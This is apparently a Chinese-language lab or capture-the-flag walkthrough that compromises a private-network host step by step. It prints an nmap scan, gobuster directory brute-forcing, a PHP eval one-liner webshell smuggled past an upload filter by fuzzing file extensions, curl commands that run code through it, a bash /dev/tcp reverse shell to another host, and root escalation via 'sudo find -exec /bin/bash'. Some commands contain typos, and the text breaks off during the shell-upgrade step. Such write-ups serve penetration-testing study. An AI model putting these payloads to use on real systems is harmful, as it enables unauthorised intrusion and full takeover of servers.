1.扫描端口10.10.1.61
目录:nmap -sV -T4 10.10.1.61
扫描出来有22的ssh远程端口,和一个80的http
2.爆破目录
命令:gobuster dir -u http://10.10.1.61 -w /usr/share/wordlists/dirb/common.txt -x php,txt,inc,bak,sql,phtml -t 50
依次访问者几个301的路径 assets 是登录页面 includes是两个php文件 uploads是一个专门放上传文件的地方
打开这些路径发现,系统本身是可以储存.phtml等这些格式
3.进入10.10.1.61,并进行一句话木马上传
进入之后发现是一个文件上传页面,并有文件格式的上传的限制
一句话木马:<?php echo eval($_POST[“cmd”]); ?> 文件命名xwf.jpg
开启抓包
抓到后右键点击Send to lntruder
进入lntruder,选择我们需要的筛选的内容右键,点击Add payload position
进入后在右边的框里输入你需要筛选的框里,后点击上方橙色的按钮
根据已有信息jpg可以通过,可以看到phtml和jpg长度最相似,可以得出初步结论phtml也可以通过
更改xwf.jpg为xwf.phtml,我这里已经改了。
4.测试一句话木马
命令:curl -X POST -d “CMD=system(‘1s -1’);” http://10.10.1.61/uploads/xwf.phtml(成功)
5.进行反弹连接
主机1:nc -lvnp 4444
主机2:curl -s -X POST http://10.10.1.61/uploads/xwf.phtml –data-urlencode ‘CMD=system(“bash -c \”bash -i >& /dev/tcp/10.10.1.72/8888 0>&1\””);’
6.查找提权
命令:find/ -perm -u+s -type -ls 2>/dev/null
发现都是/usr/的系统自带文件,没发现什么可利用的文件
命令:sudo -l
发现find可以以root权限运行
命令:sudo find . -exec /bin/bash \; -quit
7.修复交互式页面
命令:
- python3 -c “import pty;pty.spawn(‘/bin/bash’)” 调用 Pythonpty 模块,为 bash 分配虚拟终端,解决底层终端设备报错。
- Ctrl + Z 将当前反弹 shell 挂入后台
-
stty raw -echo; fg
- stty raw -echo: 本地终端切换原始传输模式、关闭输入重复回显















评论(0)
暂无评论